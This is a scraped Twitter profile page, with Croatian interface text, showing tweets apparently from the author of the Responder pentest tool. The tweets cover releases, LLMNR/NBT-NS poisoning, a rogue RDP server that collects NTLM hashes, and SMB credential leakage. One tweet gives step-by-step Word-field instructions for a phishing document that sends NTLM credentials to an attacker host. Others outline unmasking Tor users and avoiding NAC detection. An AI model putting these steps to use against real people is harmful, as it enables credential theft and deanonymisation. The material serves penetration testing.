Tweetovi

Blokirali ste korisnika/cu @PythonResponder

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @PythonResponder

  1. 12. sij

    The only not fully supporting py3 tool is Multirelay. That update should come by February.

    Poništi
  2. proslijedio/la je Tweet
    10. sij

    I hope there will be a reality show where microsoft engineers have to implement their own shit using only info on MSDN.

    Poništi
  3. 9. sij

    Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fix, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;)

    Poništi
  4. 2. sij

    Responder 2.3.4.5 is on the way, major auth servers refactoring, py2 and py3 support, tool enhancements, and throughout Q.A. Be patient, I'm doing this on my free time, but I'm sure you'll enjoy it when it's out :)

    Poništi
  5. 9. pro 2019.

    Next release comes with *lots* of bugfix & enhancements and support for py2 and py3... :)

    Poništi
  6. 12. stu 2019.

    How are your LLMNR & NBT-NS attack chain findings rolling on these internal reports these days?

    Poništi
  7. 30. lis 2019.

    Python2 is about to die; Responder was written 8 years ago. Netbios & LLMNR are still enabled by default on latest Windows versions. We'll surely make Responder python 2&3 compliant, if MSFT still facilitate easy internal network compromises, we won't let you down either ;)

    Poništi
  8. 5. lis 2019.

    Fingerprint detailed Windows version, gather exact server time, check if SMB signing and IPC$ null sessions are enabled, and finally if RDP is open for all machines on a class C network takes ./Runfinger.py ~2,5 seconds :)

    Poništi
  9. 17. kol 2019.

    Responder 2.3.4.0 has been released. This version includes a rogue RDP server supporting RDP clients ranging from Windows7 to Windows 10 (tested) and since MSFT recommends enforcing NLA, Responder collects these NLA NTLM hashes :) Enjoy!

    Poništi
  10. 16. kol 2019.

    Responder 2.3.4.0 upcoming release will be supporting RDP ;)

    Poništi
  11. 14. kol 2019.

    Apart from exposing NTLM credentials, these type transparent outbound SMB connection (via Office suite), could be easily used to unmask some TOR users on Windows. Send fake mail with doc -> target download doc with TOR -> open it on workstation -> outbound SMB connection.

    Poništi
  12. 13. kol 2019.

    So basically SMB3+ encryption is pointless since the encryption is based on the session key (derivated from credentials), and starts after NTLM credentials are sent unencrypted...

    Poništi
  13. 13. kol 2019.

    SMB3.0+ uses encryption yes, but it's post auth... How many companies sends their NTLMv2 hashes (Azure Files supports only NTLMv2 hashes) over the internet to Azure File? 🙄

    Poništi
  14. 13. kol 2019.

    Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!

    Poništi
  15. proslijedio/la je Tweet
    29. srp 2019.

    This is why you always start Responder in analyze mode first, amirite ?

    Poništi
  16. 28. srp 2019.

    Before it was public, Responder was built to automate most of my goal oriented internal pentests. When I published it ~60-70% goal oriented internal pentesters increased their freedom and family time. Don't thanks me, Microsoft made it happen!

    Poništi
  17. 25. srp 2019.

    I've built a small multi-processed utility which query 's massive data set to collect subdomains related to a given domain. You can find this utility on github ;)

    Poništi
  18. 18. srp 2019.

    Microsoft Edge still sends your SMB NTLM credentials over the internet -in 2019- via <iframe>, <img>, etc. Great for external pentest -> internal via phishing, XSS, etc!

    Poništi
  19. 22. svi 2019.

    Always start a pentest by launching Responder in Analyze mode and carefully review the output. It will let you know if there's any NAC/etc running on that subnet attempting to identify Responder's activity. Once identified, configure Responder.conf to not respond to these IPs :)

    Poništi
  20. 16. tra 2019.

    For example, MultiRelay uses a valid Microsoft undocumented SMBv1 dialect called Cairo (see nt4 src code), wich was a Microsoft code name for a project that never shipped on any Windows version. Detecting this dialect, would be the way to go..

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·